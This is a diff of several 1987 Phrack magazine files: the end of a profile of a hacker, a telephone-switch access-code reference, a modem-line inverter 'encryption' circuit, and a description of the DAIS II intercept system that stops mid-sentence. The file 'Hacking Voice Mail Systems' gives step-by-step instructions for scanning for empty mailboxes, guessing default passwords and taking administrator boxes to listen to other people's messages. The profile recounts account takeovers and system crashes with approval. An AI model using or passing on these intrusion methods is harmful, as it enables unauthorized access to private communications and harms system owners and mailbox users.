one) (included Shockwave Rider, and Satan Knight aka Redrum), and The 2nd
|
||||
Inner Circle (included The Cracker, Mr. America, Napoleon Bonapart, Stainless
|
||||
Steal Rat, Big Brother, Mr. Xerox, Bootleg, Maxwell Wilke, Mandrake The
|
||||
Magician, and Zaphod Beeblebrox).
|
||||
|
||||
Eric got the number to Arpanet from Dark Dante, and got on the MIT
|
||||
Research System from looking through TAC News. One night he got like 50-60
|
||||
accounts on the Unix and changed all of the passwords to WIZARD.
|
||||
|
||||
Stainless Steal Rat, the Sysop of Delta BBS, and The Myth were all up
|
||||
from NJ one weekend, and they were staying the weekend at John Maxfield's
|
||||
house. They went to John's office. Wizard asked Maxfield if he could use his
|
||||
computer to print out some things he had with him and he printed out some
|
||||
stuff from the Stanford Artificial Intelligence address list for Arpanet.
|
||||
John was amazed. "Wow," he said, "I have prime evidence on you." (TK: This
|
||||
may not for sure be an exact quote). He then proceeded to bust our friend,
|
||||
Eric, the next week. He also had a lot of stuff from AUTOVON from some fellow
|
||||
in Washington and started playing with the FTS lines (Federal Telephone
|
||||
System) which he found from, none other than, John Maxfield. They had found
|
||||
the default passwords for TeleMail too, and got the administrator accounts and
|
||||
set up their own BBS on Nassau and Coca-Cola systems plus anywhere else
|
||||
possible. And all of a sudden, it all came down when Mandrake decided to
|
||||
crash parts of TeleMail. Enter, Federal Bureau of Investigations. They had
|
||||
been monitoring Eric for 6 months looking for some evidence to get him on.
|
||||
And thus, they got it. Nothing really happened, but he had to get a lawyer
|
||||
and he got some publicity in the paper. After 90 days, everything they had
|
||||
taken, with the exception of a few documents, was sent back. During those 90
|
||||
days, Eric worked as a computer security consultant at a bank making $200 an
|
||||
hour (2 hours...).
|
||||
|
||||
The only "phreaks" he's met are Stainless Steal Rat and Cable Pair.
|
||||
|
||||
Eric has been mentioned on local TV/News, in newspapers, USA Today,
|
||||
NY Times, Washington Post, Books, and Britannica Encyclopedia (look under
|
||||
Hacker).
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Interests: Music (preferably jazz, reggae, new wave), Eastern
|
||||
philosophy (Zen Buddhism), reading Jack Kerouac books (a
|
||||
great beatnik writer), driving aimlessly, slowly becoming
|
||||
a social recluse, physics, and Greek mathematicians.
|
||||
|
||||
Eric's Favorite Things
|
||||
----------------------
|
||||
|
||||
Women: The pursuit thereof (Karen Wilder).
|
||||
Foods: Chinese.
|
||||
Cars: BMW 320-I.
|
||||
Artist: Salvador Dali.
|
||||
Plans for next few months: Next year and a half - travelling to Montreal in
|
||||
April for a week of leisure, then jetting back to
|
||||
beautiful Detroit and continuing his studies at
|
||||
Eisenhower High School.
|
||||
|
||||
Most Memorable Experiences
|
||||
--------------------------
|
||||
|
||||
Realizing all at once that everything you did 3 years ago was stupid.
|
||||
Growing into a new person.
|
||||
Gaining morals and new ideas and a new outlook.
|
||||
|
||||
Some People to Mention
|
||||
----------------------
|
||||
|
||||
Tuc (For telling him about boxing).
|
||||
Tom Tone (For calling him on his first conference).
|
||||
Magnetic Surfer (Talking to him for the first time after Sherwood Forest went
|
||||
down voice).
|
||||
John Maxfield (Meeting him).
|
||||
Stainless Steal Rat (Meeting him...with John Maxfield).
|
||||
Dark Dante (One of the legends phreakdom).
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Always follow your instinct and not your desire for you will be
|
||||
sorry because you will be lying to yourself.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
I hope you enjoyed this file. Look forward to more Phrack Pro-Philes coming
|
||||
in the near future. ...And now for the regularly taken poll from all
|
||||
interviewees.
|
||||
|
||||
Of the general population of phreaks you have met, would you consider most
|
||||
phreaks, if any, to be computer geeks? No, says Eric, he considers them a new
|
||||
breed of intellect. Thanks for your time, Eric.
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
158
phrack11/3.txt
Normal file
158
phrack11/3.txt
Normal file
|
@ -0,0 +1,158 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #3 of 12
|
||||
|
||||
.___. .___.
|
||||
|___| |___|
|
||||
| |
|
||||
/^\ /^\
|
||||
[+]PLP[+]------------------------------------------[+]PLP[+]
|
||||
\^/ ^ ^ \^/
|
||||
|S| P ^[+]The Executioner[+]^ P |S|
|
||||
|e| PLP ^[+]PhoneLine Phantoms![+]^ PLP |e|
|
||||
|x| P _____[+]The Network Technicians[+]______ P |x|
|
||||
|y| ^ ------------------------ ^ |y|
|
||||
|-| [+] PACT: Prefix Access Code Translator [+] |-|
|
||||
|T| ^ ==================================== ^ |T|
|
||||
|N| [+]Written for PHRACK Inc. Issue Eleven.[+] |N|
|
||||
|T| |T|
|
||||
|-|_______. Call Phreak Klass, Room 2600 ._______|-|
|
||||
|PHRACK XI| [806][799][0016] Login:EDUCATE |PHRACK XI|
|
||||
--------| |________________________________| |--------
|
||||
|____________________________________|
|
||||
|
||||
|
||||
The PACT (Prefix Access Code Translator) feature provides preliminary
|
||||
translation data for features using access codes that are prefixed by a
|
||||
special code. A standard numbering and dialing plan requires that individual
|
||||
line and small business customers' (custom) calling use prefixed access code
|
||||
dialing for feature access. PACT is offered on a per office basis. The PACT
|
||||
is NOT used for the interpretation of Centrex dialing customers.
|
||||
When a call is originated by the customer, a call register is used to
|
||||
store the data about the call. The customer dials a prefix and a 2 digit
|
||||
access code (table a). The PACT then looks at the digits to determine what
|
||||
action should take place. Reorder or special service error messages will be
|
||||
heard if you enter an unassigned code. If the code is accepted, then that
|
||||
particular action will be performed. The PACT consists of the PACT head table
|
||||
and the prefixed access code translator. The PACT feature allows the dialing
|
||||
of a special code for a prefix. These are the '*' and '#'. If you have rotary,
|
||||
then '11' and '12' are used respectively. To use PACT, the prefix must be
|
||||
followed by a 2-digit code. This combination is then defined in terms of type
|
||||
and subtype (table b).
|
||||
|
||||
TABLE A
|
||||
____________________________________________________________
|
||||
| Access Code | Description of function |
|
||||
|________________________|_________________________________|
|
||||
| *2X - *3X (x= 0-9) | Growth to 2 or 3 digit codes |
|
||||
| | (Future may call for these) |
|
||||
| | |
|
||||
| *4X - *5X - *7X | Local Area Signalling Services |
|
||||
| | |
|
||||
| *72 | Call Forwarding Activation |
|
||||
| | |
|
||||
| *73 | Call Forwarding Deactivation |
|
||||
| | |
|
||||
| *74 | 1-digit speed dialing |
|
||||
| | |
|
||||
| *75 | 2-digit speed dialing |
|
||||
| | |
|
||||
| #56 | Circuit Switched Digital |
|
||||
| | Capability |
|
||||
|________________________|_________________________________|
|
||||
|
||||
The subtranslator is always built 100 words long. A word is a binary code
|
||||
which, when sent as a whole, act as a command. One word is equal to a 2-digit
|
||||
access code. This subtranslator contains the PTW (Primary Translation Word).
|
||||
The PTW contains the feature type subtype and feature subtype index to
|
||||
determine the function of the dialed code. The feature subtype allows four
|
||||
subtype tables to exist for feature type 31 (LASS). Index 0 is for LASS. Index
|
||||
1 is used for LASS on a pay per usage basis. Index 2 and 3 are currently not
|
||||
used.
|
||||
|
||||
TABLE B (written in report form)
|
||||
================================
|
||||
|
||||
Feature Type: 0 (Unassigned)
|
||||
|
||||
Feature Type: 1 (1-digit abbr. dialing)
|
||||
|
||||
Subtypes: 0 (Speed Call)
|
||||
1 (Change the Speed Call List)
|
||||
2 (Invalid)
|
||||
|
||||
Feature Type: 2 (2-digit dialing.)
|
||||
|
||||
Subtypes: (Same as Feature 1)
|
||||
|
||||
Feature Type: 3 (Circuit Switch Digital Capability)
|
||||
|
||||
Subtype: 1 (CSDC 56 kilo bit service)
|
||||
|
||||
Feature Type: 4 (Usage Sensitive 3-way)
|
||||
|
||||
Feature Type: 5 (Cancel Call Waiting)
|
||||
|
||||
Feature Type: 20 (Call Forwarding Activate)
|
||||
|
||||
Feature Type: 21 (Call Forwarding deactivate)
|
||||
|
||||
Feature Type: 22 (Project Acct. Service (Autoplex))
|
||||
|
||||
Feature Type: 26 (Customer changeable Inter LATA carrier)
|
||||
|
||||
Feature Type: 27 (Voice/Data Protection)
|
||||
|
||||
Feature Type: 28 (MDS-Message Desk Service)
|
||||
|
||||
Subtypes: 0 (MDS activation)
|
||||
1 (MDS deactivation)
|
||||
|
||||
Feature Type: 30 (Residence Data Facility Pooling)
|
||||
|
||||
Feature Type: 31 (Local Area Signalling Services-LASS)
|
||||
[index 0]
|
||||
|
||||
Subtypes: 0 (AR-Automatic Recall {Incoming Calls})
|
||||
1 (AR-Outgoing calls)
|
||||
2 (AR activation incoming/outgoing)
|
||||
3 (AR deactivation)
|
||||
4 (Customer Originated Trace Activation)
|
||||
5 (Distinctive Alert Activation)
|
||||
6 (ICLID activation)
|
||||
7 (Selective Call Rejection Activation)
|
||||
8 (Selective Call Forwarding activation)
|
||||
9 (Private Call Activation)
|
||||
10 (Distinctive Alert -OFF)
|
||||
11 (ICLID-OFF)
|
||||
12 (SCR-OFF)
|
||||
13 (SCF-OFF)
|
||||
14 (Private Call-OFF)
|
||||
15 (Distinctive Alert ON/OFF) toggle for opposite
|
||||
16 ICLID toggle on/off
|
||||
17 SCR toggle on/off
|
||||
18 SCF toggle on/off
|
||||
19 Private Call on/off
|
||||
20 Selective Call Acceptance-ON
|
||||
21 SCA OFF
|
||||
22 SCA toggle on/off
|
||||
23 (Computer Access Restriction) on
|
||||
24 CAR off
|
||||
25 CAR on/off
|
||||
26-31 (reserved for future LASS functions)
|
||||
|
||||
Index 1 Pay Per View
|
||||
|
||||
subtype: 0 (Order placement)
|
||||
1 (Order Cancel)
|
||||
|
||||
The PACT function is extremely important for LASS functions. PACT is what
|
||||
lets you tell your switch what you want done. Without the PACT, communication
|
||||
between you and your CO would not exist. PACT is the base foundation for the
|
||||
use access codes.
|
||||
============================================================
|
||||
= If you have any questions or comments, please leave mail =
|
||||
= either on Phreak Klass Room 2600 or at 214-733-5283. =
|
||||
============================================================
|
||||
= (c) The Executioner/PLP/TNT =
|
||||
============================================================
|
101
phrack11/4.txt
Normal file
101
phrack11/4.txt
Normal file
|
@ -0,0 +1,101 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #4 of 12
|
||||
|
||||
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
|
||||
+=+ Hacking Voice Mail Systems +=+
|
||||
+=+ Written for Phrack XI +=+
|
||||
+=+ by:-> Black Knight from 713 +=+
|
||||
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
|
||||
|
||||
|
||||
Voice Mail is a relatively new concept and not much has been said about it.
|
||||
It is a very useful tool for the business person and the phreak. The way it
|
||||
works is that somebody wishing to get in touch with you calls a number,
|
||||
usually a 1-800, and punches in on his touch-pad your mailbox number and then
|
||||
he is able to leave a message for you. Business experts report that this
|
||||
almost totally eliminates telephone tag. When a person wishes to pick up his
|
||||
message all he needs to do is call the number enter a certain code and he can
|
||||
hear his messages, transfer them, and do other misc. mailbox utilities.
|
||||
|
||||
Most VMSs are similar in the way they work. There are a few different ways
|
||||
the VMSs store the voice. One way is that the voice is recorded digitally and
|
||||
compressed and when heard it is reproduced back into the voice that recorded
|
||||
it. Another method that is slower and uses more space, but costs less, stores
|
||||
the voice on magnetic tape, the same type that is used to store data on a
|
||||
computer, and then runs the tape at a slow speed. Using this method the voice
|
||||
does not need to be reproduced in any way and will sound normal as long as the
|
||||
tape is running at a constant speed. On some of the newer VMSs the voice is
|
||||
digitally recorded and is transformed from the magnetic tape at about 2400
|
||||
bits per second.
|
||||
|
||||
There are many different types and versions of voice mail systems. Some of
|
||||
the best and easiest to get on will be discussed.
|
||||
|
||||
Centagram
|
||||
---------
|
||||
These are direct dial (you don't have to enter a box number). To get on one
|
||||
of these, first have a number to any box on the system. All of the other
|
||||
boxes will be on the same prefix; just start scanning them until you find one
|
||||
that has a message saying that person you are calling is not available. This
|
||||
usually means that the box has not been assigned to anybody yet. Before the
|
||||
nice lady's voice tells you to leave the message, hit #. You will then be
|
||||
prompted for your password. The password will usually be the same as the last
|
||||
four digits of the box's number or a simple number like 1000, 2000, etc. Once
|
||||
you get on, they are very user friendly and will prompt you with a menu of
|
||||
options. If you can't find any empty boxes or want to do more, you can hack
|
||||
but the system administrators box, which will usually be 9999 on the same
|
||||
prefix as the other boxes, will allow you to hear anybody's messages and
|
||||
create and delete boxes.
|
||||
|
||||
Sperry Link
|
||||
-----------
|
||||
These systems are very nice. They will usually be found on an 800 number.
|
||||
These are one of the hardest to get a box on because you must hack out a user
|
||||
ID (different from the person's box number) and a password. When it answers,
|
||||
if it says, "This is a Sperry Link voice station. Please enter your user ID,"
|
||||
you will have to start trying to find a valid user ID. On most Sperrys it
|
||||
will be a five digit number. If it answers and says, "This is an X answering
|
||||
service," you first have to hit *# to get the user number prompt. Once you
|
||||
get a valid user number will have to guess the password on most systems, it
|
||||
will be 4 digits. Once you get in, these are also very user friendly and have
|
||||
many different options available.
|
||||
|
||||
RSVP
|
||||
----
|
||||
This is probably one of the worst VMSs but it is by far the easiest to get
|
||||
yourself a box. When it answers you can hit * for a directory of the boxes on
|
||||
it (it will only hold 23). If you hit # you will be given a menu of options
|
||||
and when you choose an option you will then be prompted for your ID number.
|
||||
The ID number on an RSVP system will just about always be the same as the
|
||||
mailbox number, which are always only 2 digits.
|
||||
|
||||
A.S.P.E.N.
|
||||
----------
|
||||
The Aspen voice message systems made by Octel Telecommunications is in my
|
||||
opinion the BEST VMS made. To get a box on an Aspen, you need to find an
|
||||
empty box. To find an empty box, scan the box numbers and if one says, "You
|
||||
entered XXXX. Please leave a message at the tone," then this is an empty box.
|
||||
You next just press # and when prompted for your box number enter the number
|
||||
of the empty box and friendly voice of the nice lady will guide you through
|
||||
all of the steps of setting up your box. She first tells you what you can do
|
||||
with the box and then will prompt you with, "Please enter the temporary
|
||||
password assigned to you by your system manager." This password will usually
|
||||
be 4 digits long and the same as the box number like 1000, etc. Once you get
|
||||
on their are many things you can do. You can make a distribution list where
|
||||
if you want to leave a certain message to more than one person, you can enter
|
||||
the list number and all of the boxes on the list will get the message. You can
|
||||
also have the system call you and notify you that you have new messages. These
|
||||
systems also have what they call "Information center mailboxes" that are
|
||||
listen only and can also have a password on them so the person calling has to
|
||||
enter the password before he hears the greeting message. Aspen VMSs have a
|
||||
system managers mailbox that will just about give you total control of the
|
||||
whole system and let you listen to people's mail, create and delete boxes, and
|
||||
many other things.
|
||||
|
||||
Thank you for reading this file and if you would like to get in touch with me
|
||||
VIA VOICE MAIL call 1-800-222-0311 and hit *2155.
|
||||
|
||||
//--Black Knight from 713--\\
|
||||
| for PHRACK XI (1987) |
|
||||
\\--++--++--++--++--++--++-//
|
97
phrack11/5.txt
Normal file
97
phrack11/5.txt
Normal file
|
@ -0,0 +1,97 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #5 of 12
|
||||
|
||||
{Simple Data Encryption}
|
||||
<or digital electronics 101>
|
||||
By:{The Leftist}
|
||||
|
||||
Prologue:
|
||||
|
||||
Well, it's been awhile since I've done one of my activities files. This time
|
||||
I've switched from chemistry to electronics. Hopefully, I will be writing
|
||||
more files similar to this one. Also, I have devised a more sophisticated
|
||||
encryption device, which I may release in the future
|
||||
|
||||
Do you run a BBS, living in fear that the "feds" are gonna log on, and fool
|
||||
you into giving them a password? Do you wish that you could limit exactly WHO
|
||||
logs onto your board? Well, this file is just for you..
|
||||
|
||||
Parts:
|
||||
|
||||
1:9 volt battery
|
||||
|
||||
1: 74hc/hct04 cmos hex inverter <about .50 cents>
|
||||
|
||||
Some basic knowledge of electronics might help, and some wire would be helpful
|
||||
too. If you want to be fancy you can even splurge and get a 9 volt connector.
|
||||
|
||||
Note: Although it is not required that you put this on an etched PC board, you
|
||||
can do this quite easily, and it makes for a much cleaner job.
|
||||
|
||||
Ok, the basic idea behind this scheme is this:
|
||||
|
||||
Data coming to and going from your modem is translated as 1's and 0's. This
|
||||
represents highs and lows, which translate out to code which your computer
|
||||
recognizes as valid data. Now, if you could switch all those 1's to 0's, and
|
||||
0's to 1's, then you would have a simple way of encrypting your data. That's
|
||||
exactly what the hex inverter does. If it sees a 0, it makes it a 1. If it
|
||||
sees a 1, it makes it a 0. So, what you want to do is have an inverter on your
|
||||
send line, and an inverter on your receive line. The computer you are
|
||||
connected to must also have inverters on its send and receive, or all you will
|
||||
see will be garbage! I tried to be as non-technical as possible in this for
|
||||
all you non-technical types out there.
|
||||
|
||||
|
||||
Connections:
|
||||
|
||||
Hold the chip, and look at it. There should be a little notch in one end. Hold
|
||||
it as illustrated in the schematic:
|
||||
|
||||
(80 columns)
|
||||
|
||||
|
||||
______________________________
|
||||
| |
|
||||
14 13 11 12 10 9 8 |
|
||||
| | | | | | | |
|
||||
__________________ |
|
||||
| | |_ to positive on battery
|
||||
\ 74hc/hct04 |
|
||||
/ |
|
||||
|__________________| to negative on battery
|
||||
| | | | | | | |
|
||||
1 2 3 4 5 6 7______________|
|
||||
| | | |
|
||||
| | | |_________________________________to computer port
|
||||
| | |_______________________________from modem
|
||||
| |________________________________________________to modem conn.
|
||||
|________________________________________________ from computer port
|
||||
|
||||
|
||||
<all other pins are not connected>
|
||||
|
||||
|
||||
Ok, hook the + 9volts up to pin 14, and the negative up to pin 7.
|
||||
There are 6 inverters on this chip. For this, we will be using only 2 of them.
|
||||
|
||||
Find the wire coming from your computer to the send data line on your modem.
|
||||
Sever this wire, and hook one side of it to pin 1. Hook the other end of it to
|
||||
pin 2. Next, find the receive data line, and sever it. Hook one end of it to
|
||||
pin 3, the other end to pin 4. That's about it.. if you want to use the other
|
||||
inverters on the chip, here's the complete pinouts.
|
||||
|
||||
Pin# Name and function
|
||||
---- -----------------
|
||||
1,3,5,9,11,13 Data inputs
|
||||
---------------------------------
|
||||
2,4,6,8,10,12 Data outputs
|
||||
---------------------------------
|
||||
7 Ground
|
||||
---------------------------------
|
||||
14 VCC
|
||||
---------------------------------
|
||||
|
||||
Remember, that your BBS modem must have one of these devices on it, as well as
|
||||
the user calling. I have tested this on Smartmodems, and it does work. If you
|
||||
have an internal modem, this may be a little difficult for you.
|
270
phrack11/6.txt
Normal file
270
phrack11/6.txt
Normal file
|
@ -0,0 +1,270 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #6 of 12
|
||||
|
||||
Taran King Presents...
|
||||
|
||||
AIS - Automatic Intercept System
|
||||
|
||||
The DAIS II System by Computer Consoles Incorporated
|
||||
|
||||
INTRODUCTION...
|
||||
~~~~~~~~~~~~~~~
|
||||
Computer Consoles Incorporated (CCI) manufactures various hardware
|
||||
appliances to be used in conjunction with phone companies switches as well as
|
||||
other aspects of the companies' uses, plus computer systems such as their own
|
||||
Unix-supporting systems.
|
||||
DAIS II is the Distributed Automatic Intercept System, which is the
|
||||
system used to announce if the subscriber has dialed a non-working number.
|
||||
This is what you hear, in action, when you dial a wrong number and get the 3
|
||||
tones plus the announcement or the ONI (Operator Number Identification)
|
||||
intercept operator ("What number did you dial?").
|
||||
The information from this file comes mostly from an instructional
|
||||
manual sent to me by CCI, who can be reached at 800-833-7477 or 716-482-5000
|
||||
directly, or may be written to at 97 Humbolt Street, Rochester, NY, 14609.
|
||||
|
||||
INTERCEPTION
|
||||
~~~~~~~~~~~~
|
||||
Most definitely any person who has used a telephone in his life has,
|
||||
by some means or another, come across the dreaded 3 tones, leading up to the
|
||||
ever-so-cumbersome announcement telling of the disconnected or non-working
|
||||
number. This file will go into how the whole system works.
|
||||
After dialing the non-working number, the telco's Class 5 End Office
|
||||
routes the call to DAIS II.
|
||||
|
||||
ANI Calls
|
||||
~~~~~~~~~
|
||||
Provided that the End Office has Automatic Number Identification
|
||||
(ANI) equipment, the equipment then identifies the digits of the called number
|
||||
and sends them to the intercept system.
|
||||
The system receives the called number from the end office, retrieves
|
||||
information for that number from the intercept database, formulates the
|
||||
message, and delivers it to the customer in an automated announcement. These
|
||||
announcements can either be standardized or tailored to the independent
|
||||
telephone companies' needs. If further assistance is required, the caller can
|
||||
then stay on the line and wait for an operator to come onto the line.
|
||||
|
||||
ONI Calls
|
||||
~~~~~~~~~
|
||||
When the End Office is primitive, and they don't have the ANI
|
||||
equipment to do the above ritual, operators are directly involved. These
|
||||
operators are also called into action when there is an ANI or DAIS II failure.
|
||||
When the ONI (Operator Number Identification) call comes in, DAIS II
|
||||
routes the call to the operator. The operator asks for the number that the
|
||||
customer called and then keys it into her KDT (Keyboard Display Terminal).
|
||||
After she hits the command key, the number's information is searched for in
|
||||
the intercept database, the message is formulated, and the automated response
|
||||
is announced. Once again, if the caller needs further assistance, an operator
|
||||
will return to the line to help the subscriber.
|
||||
|
||||
Operators will return to the line for any number of reasons. They
|
||||
include the following:
|
||||
|
||||
Unsuccessful Searches - After DAIS II receives the called number from ANI
|
||||
equipment or from an operator, it searches the
|
||||
database to find the intercept message associated with
|
||||
the telephone number. The database contains all
|
||||
10,000 line numbers for each exchange in the calling
|
||||
area. If the system cannot complete the search, the
|
||||
number was either keyed in incorrectly or there is a
|
||||
problem in the system. The call is then routed to an
|
||||
operator and displays the intercepted number
|
||||
(including NPA) on the KDT screen along with a message
|
||||
indicating why the search could not be completed. If
|
||||
the number was keyed in wrong, the operator will
|
||||
correct the number, or else she will ask the
|
||||
subscriber to re-dial the number.
|
||||
Aborted Announcements - If a search is given successful but for one reason or
|
||||
another the automated announcement cannot be given,
|
||||
the call is routed to an operator. The KDT display
|
||||
shows the intercepted number, the appropriate
|
||||
information for a verbal response, and the message,
|
||||
"VERBAL REPORT." In this case, the operator quotes
|
||||
the message to the caller rather than activating the
|
||||
automated response.
|
||||
Reconnects - If a customer remains on the line for more information
|
||||
after receiving the automated announcement, the system
|
||||
routes the call to an operator. The operator's KDT
|
||||
display shows the called number plus other pertinent
|
||||
information given to the caller in the previous
|
||||
announcement. From here, the operator can respond
|
||||
verbally to the customer's needs, or activate the
|
||||
automated system again. The DAIS II system allows up
|
||||
to 4 reconnects per call, but the possible number of
|
||||
reconnects available ranges from 0-3. With 1
|
||||
reconnect, the operator must report verbally.
|
||||
Split Referrals - If a number has been changed but replaced with two
|
||||
numbers, this is called a "split referral." When the
|
||||
database finds 2 or more numbers, the DAIS II system
|
||||
routes the customer to an operator, displaying the old
|
||||
number and new listings on the KDT screen. The
|
||||
operator then asks which number they are looking for
|
||||
and keys in the command key to activate the
|
||||
announcement, or else they do the announcement
|
||||
verbally.
|
||||
|
||||
Operator Searches
|
||||
~~~~~~~~~~~~~~~~~
|
||||
Situations may arise where the subscriber needs more information
|
||||
than was given by the automated announcement, or believes the information to
|
||||
be invalid. DAIS II provides for operators to have access to both the
|
||||
intercept and the DA databases at all times as long as the system
|
||||
administrator, who judges the extent to which operators can use the
|
||||
cross-search capability, allows it.
|
||||
|
||||
Components Of The System
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The telco's Class 5 End Offices contain switching equipment that
|
||||
routes calls to DAIS II. If the office has ANI equipment, the switch routes
|
||||
the called digits to the intercept system in the form of multi-frequency
|
||||
tones. The end offices route calls to DAIS II on dedicated (direct) trunks.
|
||||
These direct trunks can carry ANI traffic or ONI traffic, but not both.
|
||||
|
||||
If trunk concentrators are used, the concentrator trunks to DAIS II
|
||||
may carry ANI calls, ONI calls, or both, depending on the types of trunks
|
||||
coming into the concentrators from the end offices. The call is identified as
|
||||
ANI or ONI through MF tones transmitted by the concentrators.
|
||||
|
||||
If an operator must be involved (due to ONI or further assistance),
|
||||
DAIS II routes the call to the telco's ACD (Automatic Call Distributor), which
|
||||
is a switching device that routes calls to any available operator.
|
||||
|
||||
The intercept data base resides on disk in the ARS (Audio Response
|
||||
System). ARS processors known as Audio Response Controllers (ARCs) search the
|
||||
intercept database. If a call requires an operator's services, the Marker
|
||||
Decoder Unit (MDU) provides ACD routing information to the ARC.
|
||||
|
||||
The DAIS II Automatic Intercept Communications Controllers (AICCs)
|
||||
route messages between the ARCs and the DAIS II subsystems. An intercept
|
||||
subsystem that is housed at the same location as the database is called a
|
||||
Colocated Automated Intercept System (CAIS). A subsystem located at a
|
||||
distance from the database is known as a Local Automated Intercept System
|
||||
(LAIS). Each subsystem can provide automated announcements without using
|
||||
expensive trunking to route ANI calls to a centralized intercept office. Only
|
||||
calls that require operator assistance are routed on trunks to the ARS site.
|
||||
Because those trunks are only held white the operator identifies the number
|
||||
and are released before the announcement begins, trunk requirements are
|
||||
reduced. The automated announcement is always given by the intercept
|
||||
subsystem.
|
||||
|
||||
Each CAIS or LAIS site contains a Trunk Time Switch (TTS) and DAIS II
|
||||
Audio Response Units (DARUs). Intercept trunks from the concentrators and the
|
||||
Class 5 End Offices terminate at the TTS. When an ONI call comes in on one of
|
||||
these trunks, the TTS routes it to the ACD. When an ANI call comes in, the
|
||||
TTS routes the called number to the ARC. After the ARC retrieves the
|
||||
appropriate message from the database, it sends that information back to the
|
||||
TTS, which connects a DARU port to the trunk on which the call came in. Then,
|
||||
the DARU produces an automated announcement of the message and delivers it to
|
||||
the caller. ARS hardware generates only DA announcements whereas DAIS II
|
||||
hardware generates only intercept announcements.
|
||||
|
||||
Automatic Intercept Communications Controller (AICC)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The AICC routes messages between the ARC and the TTS. Two units are
|
||||
required to enhance system reliability. Each pair of AICCs can communicate
|
||||
with up to 4 CAIS or LAIS subsystems.
|
||||
|
||||
The AICCs are similar to the Audio Communications Controllers (ACCs)
|
||||
in the ARS system, but AICCs use a Bisynchronous Communications Module (BSCM)
|
||||
instead of a LACIM.
|
||||
|
||||
An AICC can be equipped with up to 8 BSCMs, each of which handles one
|
||||
synchronous communication line to the TTS. The BSCM models selected depend on
|
||||
the location of the AICC with respect to the CAIS/LAIS sites. Standard SLIMs
|
||||
(Subscriber Line Interface Modules) are required for communication with the
|
||||
ARC.
|
||||
|
||||
Trunk Time Switch (TTS)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The TTS has two types of components: the Peripheral Modules (PMs) and
|
||||
the Common Controls (CCs).
|
||||
|
||||
The PM contains the printed circuit boards that provide the link
|
||||
between the end office's ANI trunks and the ARC and between the ONI trunks and
|
||||
the ACD. The activity of the PM is under direction of the CC
|
||||
|
||||
A PM rack contains five types of circuit boards: Multi-frequency
|
||||
Receivers (MFRs), Analog Line Front Ends (ALFEs), T1 Front Ends (T1FEs),
|
||||
Peripheral Module Access Controllers (PMACs), and Multi-purpose Peripheral
|
||||
Devices (MPPDs).
|
||||
|
||||
The MFRs translate the intercepted number from multi-frequency tones
|
||||
to ASCII digits for ANI calls; for ONI calls that come through a trunk
|
||||
concentrator, the MFRs translate the tones sent by the concentrator to
|
||||
indicate an ONI call. Based on the tones, the MFR determines the type of
|
||||
call: regular, trouble, etc.
|
||||
|
||||
ALFEs convert incoming analog data to digital form so that it can be
|
||||
switched on the digital network. They also convert outgoing digital data back
|
||||
to analog. Incoming ALFEs provide the link between the TTS and the analog
|
||||
trunks from the Class 5 End Offices. Outgoing ALFEs provide the link between
|
||||
the TTS and the analog trunks to the ACD.
|
||||
ALFE is subdivided into two types for both incoming and outgoing:
|
||||
ALFE-A (contains the control logic, PCM bus termination, and ports for 8
|
||||
trunks) and ALFE-B (contains ports for 16 trunks, but must be paired with an
|
||||
ALFE-A in order to use the control logic and PCM bus on the backplane).
|
||||
ALFE-As can be used without ALFE-Bs, but not vice versa.
|
||||
Incoming ALFEs support E&M 2-wire, E&M 4-wire, reverse battery, and
|
||||
3-way signalling trunks. Outgoing ALFEs support E&M 2-wire, reverse battery,
|
||||
and high-low trunking.
|
||||
|
||||
T1FEs provide the links between the TTS and the D3-type T1 spans from
|
||||
the end offices. They also link the DARU VOCAL board ports and the TTS. Each
|
||||
board has 24 ports in order to handle a single T1 span which carries 24 voice
|
||||
channels.
|
||||
|
||||
PMAC is based on a Motorola 68000 microprocessor that directs and
|
||||
coordinates data flow within the PM.
|
||||
|
||||
MPPD boards provide bus termination and the system clocks for the
|
||||
digital network. The MPPD contains a master and a secondary clock, which are
|
||||
synchronized with the frequency of an incoming T-1 span. The module also
|
||||
contains its own clock for use when T-1 synchronization is not available or
|
||||
lost.
|
||||
The MPPD also generates the ringing tones, busy signals, and reorder
|
||||
tones heard by the customer and sends the zip (alert) tone to the operator.
|
||||
|
||||
The CC controls the interaction between the PM components and the
|
||||
DARU. It contains the Office Dependent Data Base (ODDB), which is a system
|
||||
table that describes the configuration of the TTS. The CC uses the ODDB to
|
||||
determine whether an incoming call is an ANI or ONI trunk.
|
||||
The CC sets up paths through the digital network in order to
|
||||
coordinate the resources of the CAIS/LAIS. It receives messages from the
|
||||
PMAC, stores information necessary for returning a response to the appropriate
|
||||
trunk, and controls message routing to and from the ARC or the operator. It
|
||||
also synchronizes the TTS and the Directory Assistance System (DAS) for
|
||||
operator-caller communications.
|
||||
The CC is a Power-series standalone processor that contains a central
|
||||
processing unit (CPU-2), based on the Motorola 68000 microprocessor. The
|
||||
processor also contains distributed intelligence for controlling the memory
|
||||
subsystem, the IO (input/output) subsystem, and the disk/tape subsystem. Each
|
||||
CC includes a Winchester disk drive, a quarter-inch tape drive, and additional
|
||||
miscellaneous hardware.
|
||||
|
||||
DAIS II Audio Response Unit (DARU)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The DARU contains the VOCAL boards that produce automated
|
||||
announcements, which are compiled from a vocabulary stored in RAM. A
|
||||
CAIS/LAIS contains 1 to 3 DARUs, each with 48 ports.
|
||||
If a CAIS/LAIS houses more than one DARU, the units are multi-dropped
|
||||
together. One DARU is always linked to the ARCs (either directly or by modems
|
||||
